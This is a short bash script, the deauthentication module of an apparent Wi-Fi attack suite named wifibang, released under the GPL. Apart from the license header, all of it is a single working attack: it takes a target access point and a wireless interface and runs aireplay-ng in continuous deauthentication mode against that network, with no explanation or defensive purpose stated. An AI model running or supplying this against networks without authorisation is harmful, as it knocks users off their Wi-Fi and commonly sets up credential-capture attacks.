#!/bin/bash


#wifibang    -    wifi attacks suite
#Copyright © 2018 Leviathan36 

# This file is part of wifibang.

#	wifibang is free software: you can redistribute it and/or modify
#	it under the terms of the GNU General Public License as published by
#	the Free Software Foundation, either version 3 of the License, or
#	(at your option) any later version.

#	wifibang is distributed in the hope that it will be useful,
#	but WITHOUT ANY WARRANTY; without even the implied warranty of
#	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#	GNU General Public License for more details.

#	You should have received a copy of the GNU General Public License
#	along with wifibang.  If not, see <http://www.gnu.org/licenses/>.



####################################################
                    #DEAUTH#
####################################################

ap_target=$1
wifi_int=$2

sudo aireplay-ng -00 -a $ap_target --ignore-negative-one $wifi_int || exit 1

#################### END DEAUTH ####################
